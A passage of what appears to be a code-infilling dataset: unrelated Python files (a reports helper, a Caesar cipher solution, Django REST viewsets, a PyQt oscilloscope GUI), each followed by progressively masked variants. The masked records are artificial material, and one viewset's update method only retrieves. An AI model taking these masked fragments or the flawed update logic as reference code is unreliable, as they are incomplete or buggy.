prefix = 'data:image/png;base64,'\n if not screenshot.startswith(prefix):\n raise TypeError('Screenshot is not a PNG image')\n data = base64.b64decode(screenshot[len(prefix):])\n file = os.path.join(get_config().get('reports', 'dataPath'), guid[0], guid[1], guid[2], guid[3], guid + '.png')\n dir = os.path.dirname(file)\n if not os.path.exists(dir):\n os.makedirs(dir)\n f = open(file, 'wb')\n f.write(data)\n f.close()\n if get_config().has_option('reports', 'pngOptimizerPath'):\n cmd = get_config().get('reports', 'pngOptimizerPath').split()\n cmd.append(file)\n subprocess.call(cmd)\n\n\ndef mailDigest(templateData):\n sendMail(get_config().get('reports', 'mailDigestTemplate'), templateData)\n\n\ndef sendUpdateNotification(templateData):\n sendMail(get_config().get('reports', 'notificationTemplate'), templateData)\n\n\ndef calculateReportSecret(guid):\n return hmac.new(get_config().get('reports', 'secret'), guid).hexdigest()\n\n\ndef calculateReportSecret_compat(guid):\n hash = hashlib.md5()\n hash.update(get_config().get('reports', 'secret'))\n hash.update(guid)\n return hash.hexdigest()\n\n\ndef getUserId(email):\n return hmac.new(get_config().get('reports', 'secret'), email.encode('utf-8')).hexdigest()\n\n\ndef getDigestId(email):\n hash = hashlib.md5()\n hash.update(email.encode('utf-8'))\n return hash.hexdigest()\n\n\ndef getDigestPath(dir, email):\n return os.path.join(dir, getDigestId(email) + '.html')\n\n\ndef getDigestSecret(id, (year, week, weekday)):\n mac = hmac.new(get_config().get('reports', 'secret'), id)\n mac.update(str(year))\n mac.update(str(week))\n return mac.hexdigest()\n\n\ndef getDigestSecret_compat(id, (year, week, weekday)):\n hash = hashlib.md5()\n hash.update(get_config().get('reports', 'secret'))\n hash.update(id)\n hash.update(str(year))\n hash.update(str(week))\n return hash.hexdigest()\n\n\n@cached(600)\ndef get_db():\n database = get_config().get('reports', 'database')\n dbuser = get_config().get('reports', 'dbuser')\n dbpasswd = get_config().get('reports', 'dbpassword')\n if os.name == 'nt':\n return MySQLdb.connect(user=dbuser, passwd=dbpasswd, db=database, use_unicode=True, charset='utf8', named_pipe=True)\n else:\n return MySQLdb.connect(user=dbuser, passwd=dbpasswd, db=database, use_unicode=True, charset='utf8')\n\n\ndef executeQuery(cursor, query, args=None):\n tablePrefix = get_config().get('reports', 'dbprefix')\n query = re.sub(r'#PFX#', tablePrefix, query)\n cursor.execute(query, args)\n", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ] }
[ 0 ]
#https://www.hackerrank.com/challenges/caesar-cipher-1/problem n=int(input()) stringy=input() k=int(input()) s="" for i in stringy: if ord(i)>=65 and ord(i)<=90: temp=(ord(i)+k-65)%26 s+=chr(temp+65) elif ord(i)>=97 and ord(i)<=122: temp=(ord(i)+k-97)%26 s+=chr(temp+97) else: s+=i print(s)
normal
{ "blob_id": "acf787885834961a71fb2655b9d8a1eb026942c7", "index": 4089, "step-1": "<mask token>\n", "step-2": "<mask token>\nfor i in stringy:\n if ord(i) >= 65 and ord(i) <= 90:\n temp = (ord(i) + k - 65) % 26\n s += chr(temp + 65)\n elif ord(i) >= 97 and ord(i) <= 122:\n temp = (ord(i) + k - 97) % 26\n s += chr(temp + 97)\n else:\n s += i\nprint(s)\n", "step-3": "n = int(input())\nstringy = input()\nk = int(input())\ns = ''\nfor i in stringy:\n if ord(i) >= 65 and ord(i) <= 90:\n temp = (ord(i) + k - 65) % 26\n s += chr(temp + 65)\n elif ord(i) >= 97 and ord(i) <= 122:\n temp = (ord(i) + k - 97) % 26\n s += chr(temp + 97)\n else:\n s += i\nprint(s)\n", "step-4": "#https://www.hackerrank.com/challenges/caesar-cipher-1/problem\n\nn=int(input())\nstringy=input()\nk=int(input())\ns=\"\"\nfor i in stringy:\n if ord(i)>=65 and ord(i)<=90:\n temp=(ord(i)+k-65)%26\n s+=chr(temp+65)\n elif ord(i)>=97 and ord(i)<=122:\n temp=(ord(i)+k-97)%26\n s+=chr(temp+97)\n else:\n s+=i\nprint(s)\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
from django.shortcuts import render from rest_framework import generics from rest_framework import mixins from django.contrib.auth.models import User from rest_framework import permissions from rest_framework.decorators import api_view from rest_framework.response import Response from rest_framework.request import Request from rest_framework.reverse import reverse from rest_framework import renderers from rest_framework import viewsets # Create your views here. from rest_framework.decorators import action from community.csrfsession import CsrfExemptSessionAuthentication from .serializers import InstitutionSerializer, UserSerializer from .models import Institution from rest_framework.exceptions import PermissionDenied from community.permissions import isInstitutionAdmin, getUserInstitution, belongsToInstitution, canUpdateProfile from community.filters import applyUserFilters, applyInstitutionFilters from community.mappings import generateKeys from django.db.models import Q class InstitutionViewSet(viewsets.ModelViewSet): """ This viewset automatically provides `list`, `create`, `retrieve`, `update` and `destroy` actions. Additionally we also provide an extra `highlight` action. """ queryset = Institution.objects.all() serializer_class = InstitutionSerializer permission_classes = (permissions.IsAuthenticatedOrReadOnly, ) authentication_classes = (CsrfExemptSessionAuthentication, ) def list(self, request, *args, **kwargs): if request.user.is_superuser: self.queryset = applyInstitutionFilters(request, Institution, *args, **kwargs) response = super(InstitutionViewSet, self).list(request, *args, **kwargs) response = generateKeys(response, self.serializer_class) return response def retrieve(self, request, *args, **kwargs): if not belongsToInstitution(request, self.get_object()): raise PermissionDenied(detail='User does not belong to the institution', code=None) return super(InstitutionViewSet, self).retrieve(request, *args, **kwargs) def update(self, request, *args, **kwargs): if not isInstitutionAdmin(request, self.get_object()): raise PermissionDenied(detail='User is not an admin_user', code=None) return super(InstitutionViewSet, self).retrieve(request, *args, **kwargs) def get_permissions(self): """ Instantiates and returns the list of permissions that this view requires. """ from rest_framework.permissions import IsAuthenticated, IsAdminUser if self.action =='retrieve' or self.action == 'update': permission_classes = [IsAuthenticated] else: permission_classes = [IsAdminUser] return [permission() for permission in permission_classes] class UserViewSet(viewsets.ReadOnlyModelViewSet): """ This viewset automatically provides `list` and `detail` actions. """ queryset = User.objects.all() serializer_class = UserSerializer @api_view(['GET']) def api_root(request, format=None): authentication_classes = [] return Response({ 'users': reverse('user-list', request=request, format=format), 'institutions': reverse('institution-list', request=request, format=format) })
normal
{ "blob_id": "4c43c181dbba1680e036750a2a2ea1185bbe91da", "index": 3218, "step-1": "<mask token>\n\n\nclass InstitutionViewSet(viewsets.ModelViewSet):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def get_permissions(self):\n \"\"\"\n Instantiates and returns the list of permissions that this view requires.\n \"\"\"\n from rest_framework.permissions import IsAuthenticated, IsAdminUser\n if self.action == 'retrieve' or self.action == 'update':\n permission_classes = [IsAuthenticated]\n else:\n permission_classes = [IsAdminUser]\n return [permission() for permission in permission_classes]\n\n\nclass UserViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"\n This viewset automatically provides `list` and `detail` actions.\n \"\"\"\n queryset = User.objects.all()\n serializer_class = UserSerializer\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\nclass InstitutionViewSet(viewsets.ModelViewSet):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def list(self, request, *args, **kwargs):\n if request.user.is_superuser:\n self.queryset = applyInstitutionFilters(request, Institution, *\n args, **kwargs)\n response = super(InstitutionViewSet, self).list(request, *args, **\n kwargs)\n response = generateKeys(response, self.serializer_class)\n return response\n\n def retrieve(self, request, *args, **kwargs):\n if not belongsToInstitution(request, self.get_object()):\n raise PermissionDenied(detail=\n 'User does not belong to the institution', code=None)\n return super(InstitutionViewSet, self).retrieve(request, *args, **\n kwargs)\n\n def update(self, request, *args, **kwargs):\n if not isInstitutionAdmin(request, self.get_object()):\n raise PermissionDenied(detail='User is not an admin_user', code\n =None)\n return super(InstitutionViewSet, self).retrieve(request, *args, **\n kwargs)\n\n def get_permissions(self):\n \"\"\"\n Instantiates and returns the list of permissions that this view requires.\n \"\"\"\n from rest_framework.permissions import IsAuthenticated, IsAdminUser\n if self.action == 'retrieve' or self.action == 'update':\n permission_classes = [IsAuthenticated]\n else:\n permission_classes = [IsAdminUser]\n return [permission() for permission in permission_classes]\n\n\nclass UserViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"\n This viewset automatically provides `list` and `detail` actions.\n \"\"\"\n queryset = User.objects.all()\n serializer_class = UserSerializer\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\nclass InstitutionViewSet(viewsets.ModelViewSet):\n \"\"\"\n This viewset automatically provides `list`, `create`, `retrieve`,\n `update` and `destroy` actions.\n\n Additionally we also provide an extra `highlight` action.\n \"\"\"\n queryset = Institution.objects.all()\n serializer_class = InstitutionSerializer\n permission_classes = permissions.IsAuthenticatedOrReadOnly,\n authentication_classes = CsrfExemptSessionAuthentication,\n\n def list(self, request, *args, **kwargs):\n if request.user.is_superuser:\n self.queryset = applyInstitutionFilters(request, Institution, *\n args, **kwargs)\n response = super(InstitutionViewSet, self).list(request, *args, **\n kwargs)\n response = generateKeys(response, self.serializer_class)\n return response\n\n def retrieve(self, request, *args, **kwargs):\n if not belongsToInstitution(request, self.get_object()):\n raise PermissionDenied(detail=\n 'User does not belong to the institution', code=None)\n return super(InstitutionViewSet, 
self).retrieve(request, *args, **\n kwargs)\n\n def update(self, request, *args, **kwargs):\n if not isInstitutionAdmin(request, self.get_object()):\n raise PermissionDenied(detail='User is not an admin_user', code\n =None)\n return super(InstitutionViewSet, self).retrieve(request, *args, **\n kwargs)\n\n def get_permissions(self):\n \"\"\"\n Instantiates and returns the list of permissions that this view requires.\n \"\"\"\n from rest_framework.permissions import IsAuthenticated, IsAdminUser\n if self.action == 'retrieve' or self.action == 'update':\n permission_classes = [IsAuthenticated]\n else:\n permission_classes = [IsAdminUser]\n return [permission() for permission in permission_classes]\n\n\nclass UserViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"\n This viewset automatically provides `list` and `detail` actions.\n \"\"\"\n queryset = User.objects.all()\n serializer_class = UserSerializer\n\n\n<mask token>\n", "step-4": "<mask token>\n\n\nclass InstitutionViewSet(viewsets.ModelViewSet):\n \"\"\"\n This viewset automatically provides `list`, `create`, `retrieve`,\n `update` and `destroy` actions.\n\n Additionally we also provide an extra `highlight` action.\n \"\"\"\n queryset = Institution.objects.all()\n serializer_class = InstitutionSerializer\n permission_classes = permissions.IsAuthenticatedOrReadOnly,\n authentication_classes = CsrfExemptSessionAuthentication,\n\n def list(self, request, *args, **kwargs):\n if request.user.is_superuser:\n self.queryset = applyInstitutionFilters(request, Institution, *\n args, **kwargs)\n response = super(InstitutionViewSet, self).list(request, *args, **\n kwargs)\n response = generateKeys(response, self.serializer_class)\n return response\n\n def retrieve(self, request, *args, **kwargs):\n if not belongsToInstitution(request, self.get_object()):\n raise PermissionDenied(detail=\n 'User does not belong to the institution', code=None)\n return super(InstitutionViewSet, self).retrieve(request, *args, **\n kwargs)\n\n def update(self, request, *args, **kwargs):\n if not isInstitutionAdmin(request, self.get_object()):\n raise PermissionDenied(detail='User is not an admin_user', code\n =None)\n return super(InstitutionViewSet, self).retrieve(request, *args, **\n kwargs)\n\n def get_permissions(self):\n \"\"\"\n Instantiates and returns the list of permissions that this view requires.\n \"\"\"\n from rest_framework.permissions import IsAuthenticated, IsAdminUser\n if self.action == 'retrieve' or self.action == 'update':\n permission_classes = [IsAuthenticated]\n else:\n permission_classes = [IsAdminUser]\n return [permission() for permission in permission_classes]\n\n\nclass UserViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"\n This viewset automatically provides `list` and `detail` actions.\n \"\"\"\n queryset = User.objects.all()\n serializer_class = UserSerializer\n\n\n@api_view(['GET'])\ndef api_root(request, format=None):\n authentication_classes = []\n return Response({'users': reverse('user-list', request=request, format=\n format), 'institutions': reverse('institution-list', request=\n request, format=format)})\n", "step-5": "from django.shortcuts import render\nfrom rest_framework import generics\nfrom rest_framework import mixins\nfrom django.contrib.auth.models import User\nfrom rest_framework import permissions\n\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom rest_framework.request import Request\nfrom rest_framework.reverse import reverse\nfrom rest_framework import renderers\nfrom 
rest_framework import viewsets\n# Create your views here.\n\nfrom rest_framework.decorators import action\nfrom community.csrfsession import CsrfExemptSessionAuthentication\nfrom .serializers import InstitutionSerializer, UserSerializer\nfrom .models import Institution\nfrom rest_framework.exceptions import PermissionDenied\nfrom community.permissions import isInstitutionAdmin, getUserInstitution, belongsToInstitution, canUpdateProfile\nfrom community.filters import applyUserFilters, applyInstitutionFilters\nfrom community.mappings import generateKeys\nfrom django.db.models import Q\n\nclass InstitutionViewSet(viewsets.ModelViewSet):\n \"\"\"\n This viewset automatically provides `list`, `create`, `retrieve`,\n `update` and `destroy` actions.\n\n Additionally we also provide an extra `highlight` action.\n \"\"\"\n queryset = Institution.objects.all()\n serializer_class = InstitutionSerializer\n permission_classes = (permissions.IsAuthenticatedOrReadOnly, )\n authentication_classes = (CsrfExemptSessionAuthentication, )\n\n def list(self, request, *args, **kwargs):\n if request.user.is_superuser:\n self.queryset = applyInstitutionFilters(request, Institution, *args, **kwargs)\n response = super(InstitutionViewSet, self).list(request, *args, **kwargs)\n response = generateKeys(response, self.serializer_class)\n return response\n\n def retrieve(self, request, *args, **kwargs):\n if not belongsToInstitution(request, self.get_object()):\n raise PermissionDenied(detail='User does not belong to the institution', code=None)\n return super(InstitutionViewSet, self).retrieve(request, *args, **kwargs)\n\n def update(self, request, *args, **kwargs):\n if not isInstitutionAdmin(request, self.get_object()):\n raise PermissionDenied(detail='User is not an admin_user', code=None)\n return super(InstitutionViewSet, self).retrieve(request, *args, **kwargs)\n\n\n def get_permissions(self):\n \"\"\"\n Instantiates and returns the list of permissions that this view requires.\n \"\"\"\n from rest_framework.permissions import IsAuthenticated, IsAdminUser\n if self.action =='retrieve' or self.action == 'update':\n permission_classes = [IsAuthenticated]\n else:\n permission_classes = [IsAdminUser]\n return [permission() for permission in permission_classes]\n\nclass UserViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"\n This viewset automatically provides `list` and `detail` actions.\n \"\"\"\n queryset = User.objects.all()\n serializer_class = UserSerializer\n\n@api_view(['GET'])\ndef api_root(request, format=None):\n authentication_classes = []\n return Response({\n 'users': reverse('user-list', request=request, format=format),\n 'institutions': reverse('institution-list', request=request, format=format)\n })", "step-ids": [ 5, 8, 10, 11, 13 ] }
[ 5, 8, 10, 11, 13 ] }
[ 5, 8, 10, 11, 13 ]
# -*- coding: utf-8 -*-
"""
Created on 11/03/2020

@author: [email protected]
"""
import sys
from PyQt5.QtWidgets import (QApplication, QWidget, QLabel, QRadioButton, QVBoxLayout, QCheckBox, QProgressBar,
                             QGroupBox, QComboBox, QLineEdit, QPushButton, QMessageBox, QInputDialog, QDialog, QDialogButtonBox, QSlider, QGridLayout, QHBoxLayout)
from PyQt5.QtGui import QIcon, QPainter, QPen, QFont, QPixmap
from PyQt5.QtCore import Qt
from PyQt5.QtCore import QCoreApplication, QObject, QRunnable, QThread, QThreadPool, pyqtSignal, pyqtSlot

#append the relative location you want to import from
sys.path.append("../Instrument_Libraries")
from instrumentConfig import Instrument

#For some reason the following code needs to be here for the Steam icon to show on the taskbar.
#Google code, don't know why.
import ctypes
myappid = u'mycompany.myproduct.subproduct.version' # arbitrary string
ctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID(myappid)


class MainWindow(QWidget):

    instrumentName = "Unitialized Instrument"

    instrumentList = []
    #Instrument Types is a dictionary
    instrumentTypes = {}
    instrumentKey = "Uninitialized Key"

    def __init__(self):
        super(MainWindow, self).__init__()

        self.configInstrument = Instrument()
        self.instrumentList = self.configInstrument.listInstruments()
        self.instrumentTypes = self.configInstrument.listInstrumentTypes()

        self.initUI()

    def initUI(self):
        self.setGeometry(300, 300, 500, 600)
        self.setWindowTitle('Tektronix Channel Label Widget')
        self.setWindowIcon(QIcon('Steam_icon_logo.gif'))

        instrumentGroupBox = QGroupBox()
        instrumentGrid = QGridLayout()

        self.scopeComboBox = QComboBox()
        for index in range (0, len(self.instrumentList)):
            self.scopeComboBox.addItem(self.instrumentList[index].rstrip())
        instrumentGrid.addWidget(self.scopeComboBox, 0, 0)

        self.initScopeButton = QPushButton('Initialize Scope', self)
        self.initScopeButton.clicked[bool].connect(self.initScope)
        instrumentGrid.addWidget(self.initScopeButton, 1, 0)

        scopeLabel = QLabel(self)
        scopeLabel.setText("Scope Type")
        instrumentGrid.addWidget(scopeLabel, 2, 0)

        self.scopeIDN = QLabel(self)
        self.scopeIDN.setText(self.instrumentName)
        instrumentGrid.addWidget(self.scopeIDN, 3, 0)

        instrumentGroupBox.setLayout(instrumentGrid)

        instrumentGroupBox.setLayout(instrumentGrid)

        startButtonGroupBox = QGroupBox()
        startButtonLayout = QHBoxLayout()
        self.startStopButton = QPushButton('Test Scope Connection', self)
        self.startStopButton.clicked[bool].connect(self.startStopTest)
        self.startStopButton.setEnabled(False)
        startButtonLayout.addWidget(self.startStopButton)

        self.getScopeShot = QPushButton('Get Scope Shot', self)

        pictureGroupBox = QGroupBox()
        pictureLayout = QHBoxLayout()
        self.pictLabel = QLabel(self)
        pictureLayout.addWidget(self.pictLabel)
        pictureGroupBox.setLayout(pictureLayout)

        self.getScopeShot.clicked[bool].connect(self.scopeShot)
        self.getScopeShot.setEnabled(False)
        startButtonLayout.addWidget(self.getScopeShot)

        startButtonGroupBox.setLayout(startButtonLayout)

        grid = QGridLayout()
        grid.addWidget(instrumentGroupBox, 0, 0)
        grid.addWidget(startButtonGroupBox, 1, 0)
        grid.addWidget(pictureGroupBox, 2, 0)

        self.setLayout(grid)

        self.show()

    def initScope(self):
        self.instrumentName = self.scopeComboBox.currentText()

        # self.scope, self.scopeName = self.configInstrument.initInstrument(self.instrumentName)
        self.scope, self.scopeName = self.configInstrument.initInstrument("172.18.18.24")

        print ("Configured Scope: " + self.scopeName)

        self.scopeIDN.setText(self.scopeName)

        self.startStopButton.setEnabled(True)
        self.getScopeShot.setEnabled(True)

    def startStopTest(self):
        self.scope.setState(1, "ON")
        self.scope.setState(2, "ON")
        self.scope.setState(3, "ON")
        self.scope.setState(4, "ON")

        self.scope.setBandwidth(1, "ON")
        self.scope.setBandwidth(2, "ON")
        self.scope.setBandwidth(3, "ON")
        self.scope.setBandwidth(4, "ON")

        #Siglent library hard codes trigger level to mV
        self.scope.setEdgeTrigger(3, 50, "FALL")

    def scopeShot(self):
        print ("Get Scope Shot")
        self.scope.clear()
        print ("ReadIDN Returns: " + str(self.scope.readIDN()))
        print ("next line")
        self.scope.clear()

        self.scope.scopeScreenCaptureCopyToPC("siglentImage.png")

        # loading image
        self.pixmap = QPixmap("siglentImage.png")

        # adding image to label
        self.pictLabel.setText("Image Here")
        self.pictLabel.setPixmap(self.pixmap)

        # Optional, resize label to image size
        self.pictLabel.resize(self.pixmap.width(), self.pixmap.height())


if __name__ == '__main__':

    app = QCoreApplication.instance()
    if app is None:
        app = QApplication(sys.argv)
    ex = MainWindow()
    app.exec_()
normal
{ "blob_id": "33464f19c42d1a192792a73297f4d926df78ab71", "index": 2906, "step-1": "<mask token>\n\n\nclass MainWindow(QWidget):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def initUI(self):\n self.setGeometry(300, 300, 500, 600)\n self.setWindowTitle('Tektronix Channel Label Widget')\n self.setWindowIcon(QIcon('Steam_icon_logo.gif'))\n instrumentGroupBox = QGroupBox()\n instrumentGrid = QGridLayout()\n self.scopeComboBox = QComboBox()\n for index in range(0, len(self.instrumentList)):\n self.scopeComboBox.addItem(self.instrumentList[index].rstrip())\n instrumentGrid.addWidget(self.scopeComboBox, 0, 0)\n self.initScopeButton = QPushButton('Initialize Scope', self)\n self.initScopeButton.clicked[bool].connect(self.initScope)\n instrumentGrid.addWidget(self.initScopeButton, 1, 0)\n scopeLabel = QLabel(self)\n scopeLabel.setText('Scope Type')\n instrumentGrid.addWidget(scopeLabel, 2, 0)\n self.scopeIDN = QLabel(self)\n self.scopeIDN.setText(self.instrumentName)\n instrumentGrid.addWidget(self.scopeIDN, 3, 0)\n instrumentGroupBox.setLayout(instrumentGrid)\n instrumentGroupBox.setLayout(instrumentGrid)\n startButtonGroupBox = QGroupBox()\n startButtonLayout = QHBoxLayout()\n self.startStopButton = QPushButton('Test Scope Connection', self)\n self.startStopButton.clicked[bool].connect(self.startStopTest)\n self.startStopButton.setEnabled(False)\n startButtonLayout.addWidget(self.startStopButton)\n self.getScopeShot = QPushButton('Get Scope Shot', self)\n pictureGroupBox = QGroupBox()\n pictureLayout = QHBoxLayout()\n self.pictLabel = QLabel(self)\n pictureLayout.addWidget(self.pictLabel)\n pictureGroupBox.setLayout(pictureLayout)\n self.getScopeShot.clicked[bool].connect(self.scopeShot)\n self.getScopeShot.setEnabled(False)\n startButtonLayout.addWidget(self.getScopeShot)\n startButtonGroupBox.setLayout(startButtonLayout)\n grid = QGridLayout()\n grid.addWidget(instrumentGroupBox, 0, 0)\n grid.addWidget(startButtonGroupBox, 1, 0)\n grid.addWidget(pictureGroupBox, 2, 0)\n self.setLayout(grid)\n self.show()\n <mask token>\n\n def startStopTest(self):\n self.scope.setState(1, 'ON')\n self.scope.setState(2, 'ON')\n self.scope.setState(3, 'ON')\n self.scope.setState(4, 'ON')\n self.scope.setBandwidth(1, 'ON')\n self.scope.setBandwidth(2, 'ON')\n self.scope.setBandwidth(3, 'ON')\n self.scope.setBandwidth(4, 'ON')\n self.scope.setEdgeTrigger(3, 50, 'FALL')\n\n def scopeShot(self):\n print('Get Scope Shot')\n self.scope.clear()\n print('ReadIDN Returns: ' + str(self.scope.readIDN()))\n print('next line')\n self.scope.clear()\n self.scope.scopeScreenCaptureCopyToPC('siglentImage.png')\n self.pixmap = QPixmap('siglentImage.png')\n self.pictLabel.setText('Image Here')\n self.pictLabel.setPixmap(self.pixmap)\n self.pictLabel.resize(self.pixmap.width(), self.pixmap.height())\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\nclass MainWindow(QWidget):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self):\n super(MainWindow, self).__init__()\n self.configInstrument = Instrument()\n self.instrumentList = self.configInstrument.listInstruments()\n self.instrumentTypes = self.configInstrument.listInstrumentTypes()\n self.initUI()\n\n def initUI(self):\n self.setGeometry(300, 300, 500, 600)\n self.setWindowTitle('Tektronix Channel Label Widget')\n self.setWindowIcon(QIcon('Steam_icon_logo.gif'))\n instrumentGroupBox = QGroupBox()\n instrumentGrid = QGridLayout()\n self.scopeComboBox = QComboBox()\n for index in range(0, len(self.instrumentList)):\n 
self.scopeComboBox.addItem(self.instrumentList[index].rstrip())\n instrumentGrid.addWidget(self.scopeComboBox, 0, 0)\n self.initScopeButton = QPushButton('Initialize Scope', self)\n self.initScopeButton.clicked[bool].connect(self.initScope)\n instrumentGrid.addWidget(self.initScopeButton, 1, 0)\n scopeLabel = QLabel(self)\n scopeLabel.setText('Scope Type')\n instrumentGrid.addWidget(scopeLabel, 2, 0)\n self.scopeIDN = QLabel(self)\n self.scopeIDN.setText(self.instrumentName)\n instrumentGrid.addWidget(self.scopeIDN, 3, 0)\n instrumentGroupBox.setLayout(instrumentGrid)\n instrumentGroupBox.setLayout(instrumentGrid)\n startButtonGroupBox = QGroupBox()\n startButtonLayout = QHBoxLayout()\n self.startStopButton = QPushButton('Test Scope Connection', self)\n self.startStopButton.clicked[bool].connect(self.startStopTest)\n self.startStopButton.setEnabled(False)\n startButtonLayout.addWidget(self.startStopButton)\n self.getScopeShot = QPushButton('Get Scope Shot', self)\n pictureGroupBox = QGroupBox()\n pictureLayout = QHBoxLayout()\n self.pictLabel = QLabel(self)\n pictureLayout.addWidget(self.pictLabel)\n pictureGroupBox.setLayout(pictureLayout)\n self.getScopeShot.clicked[bool].connect(self.scopeShot)\n self.getScopeShot.setEnabled(False)\n startButtonLayout.addWidget(self.getScopeShot)\n startButtonGroupBox.setLayout(startButtonLayout)\n grid = QGridLayout()\n grid.addWidget(instrumentGroupBox, 0, 0)\n grid.addWidget(startButtonGroupBox, 1, 0)\n grid.addWidget(pictureGroupBox, 2, 0)\n self.setLayout(grid)\n self.show()\n\n def initScope(self):\n self.instrumentName = self.scopeComboBox.currentText()\n self.scope, self.scopeName = self.configInstrument.initInstrument(\n '172.18.18.24')\n print('Configured Scope: ' + self.scopeName)\n self.scopeIDN.setText(self.scopeName)\n self.startStopButton.setEnabled(True)\n self.getScopeShot.setEnabled(True)\n\n def startStopTest(self):\n self.scope.setState(1, 'ON')\n self.scope.setState(2, 'ON')\n self.scope.setState(3, 'ON')\n self.scope.setState(4, 'ON')\n self.scope.setBandwidth(1, 'ON')\n self.scope.setBandwidth(2, 'ON')\n self.scope.setBandwidth(3, 'ON')\n self.scope.setBandwidth(4, 'ON')\n self.scope.setEdgeTrigger(3, 50, 'FALL')\n\n def scopeShot(self):\n print('Get Scope Shot')\n self.scope.clear()\n print('ReadIDN Returns: ' + str(self.scope.readIDN()))\n print('next line')\n self.scope.clear()\n self.scope.scopeScreenCaptureCopyToPC('siglentImage.png')\n self.pixmap = QPixmap('siglentImage.png')\n self.pictLabel.setText('Image Here')\n self.pictLabel.setPixmap(self.pixmap)\n self.pictLabel.resize(self.pixmap.width(), self.pixmap.height())\n\n\n<mask token>\n", "step-3": "<mask token>\nsys.path.append('../Instrument_Libraries')\n<mask token>\nmyappid = u'mycompany.myproduct.subproduct.version'\nctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID(myappid)\n\n\nclass MainWindow(QWidget):\n instrumentName = 'Unitialized Instrument'\n instrumentList = []\n instrumentTypes = {}\n instrumentKey = 'Uninitialized Key'\n\n def __init__(self):\n super(MainWindow, self).__init__()\n self.configInstrument = Instrument()\n self.instrumentList = self.configInstrument.listInstruments()\n self.instrumentTypes = self.configInstrument.listInstrumentTypes()\n self.initUI()\n\n def initUI(self):\n self.setGeometry(300, 300, 500, 600)\n self.setWindowTitle('Tektronix Channel Label Widget')\n self.setWindowIcon(QIcon('Steam_icon_logo.gif'))\n instrumentGroupBox = QGroupBox()\n instrumentGrid = QGridLayout()\n self.scopeComboBox = QComboBox()\n for index in 
range(0, len(self.instrumentList)):\n self.scopeComboBox.addItem(self.instrumentList[index].rstrip())\n instrumentGrid.addWidget(self.scopeComboBox, 0, 0)\n self.initScopeButton = QPushButton('Initialize Scope', self)\n self.initScopeButton.clicked[bool].connect(self.initScope)\n instrumentGrid.addWidget(self.initScopeButton, 1, 0)\n scopeLabel = QLabel(self)\n scopeLabel.setText('Scope Type')\n instrumentGrid.addWidget(scopeLabel, 2, 0)\n self.scopeIDN = QLabel(self)\n self.scopeIDN.setText(self.instrumentName)\n instrumentGrid.addWidget(self.scopeIDN, 3, 0)\n instrumentGroupBox.setLayout(instrumentGrid)\n instrumentGroupBox.setLayout(instrumentGrid)\n startButtonGroupBox = QGroupBox()\n startButtonLayout = QHBoxLayout()\n self.startStopButton = QPushButton('Test Scope Connection', self)\n self.startStopButton.clicked[bool].connect(self.startStopTest)\n self.startStopButton.setEnabled(False)\n startButtonLayout.addWidget(self.startStopButton)\n self.getScopeShot = QPushButton('Get Scope Shot', self)\n pictureGroupBox = QGroupBox()\n pictureLayout = QHBoxLayout()\n self.pictLabel = QLabel(self)\n pictureLayout.addWidget(self.pictLabel)\n pictureGroupBox.setLayout(pictureLayout)\n self.getScopeShot.clicked[bool].connect(self.scopeShot)\n self.getScopeShot.setEnabled(False)\n startButtonLayout.addWidget(self.getScopeShot)\n startButtonGroupBox.setLayout(startButtonLayout)\n grid = QGridLayout()\n grid.addWidget(instrumentGroupBox, 0, 0)\n grid.addWidget(startButtonGroupBox, 1, 0)\n grid.addWidget(pictureGroupBox, 2, 0)\n self.setLayout(grid)\n self.show()\n\n def initScope(self):\n self.instrumentName = self.scopeComboBox.currentText()\n self.scope, self.scopeName = self.configInstrument.initInstrument(\n '172.18.18.24')\n print('Configured Scope: ' + self.scopeName)\n self.scopeIDN.setText(self.scopeName)\n self.startStopButton.setEnabled(True)\n self.getScopeShot.setEnabled(True)\n\n def startStopTest(self):\n self.scope.setState(1, 'ON')\n self.scope.setState(2, 'ON')\n self.scope.setState(3, 'ON')\n self.scope.setState(4, 'ON')\n self.scope.setBandwidth(1, 'ON')\n self.scope.setBandwidth(2, 'ON')\n self.scope.setBandwidth(3, 'ON')\n self.scope.setBandwidth(4, 'ON')\n self.scope.setEdgeTrigger(3, 50, 'FALL')\n\n def scopeShot(self):\n print('Get Scope Shot')\n self.scope.clear()\n print('ReadIDN Returns: ' + str(self.scope.readIDN()))\n print('next line')\n self.scope.clear()\n self.scope.scopeScreenCaptureCopyToPC('siglentImage.png')\n self.pixmap = QPixmap('siglentImage.png')\n self.pictLabel.setText('Image Here')\n self.pictLabel.setPixmap(self.pixmap)\n self.pictLabel.resize(self.pixmap.width(), self.pixmap.height())\n\n\nif __name__ == '__main__':\n app = QCoreApplication.instance()\n if app is None:\n app = QApplication(sys.argv)\n ex = MainWindow()\n app.exec_()\n", "step-4": "<mask token>\nimport sys\nfrom PyQt5.QtWidgets import QApplication, QWidget, QLabel, QRadioButton, QVBoxLayout, QCheckBox, QProgressBar, QGroupBox, QComboBox, QLineEdit, QPushButton, QMessageBox, QInputDialog, QDialog, QDialogButtonBox, QSlider, QGridLayout, QHBoxLayout\nfrom PyQt5.QtGui import QIcon, QPainter, QPen, QFont, QPixmap\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtCore import QCoreApplication, QObject, QRunnable, QThread, QThreadPool, pyqtSignal, pyqtSlot\nsys.path.append('../Instrument_Libraries')\nfrom instrumentConfig import Instrument\nimport ctypes\nmyappid = 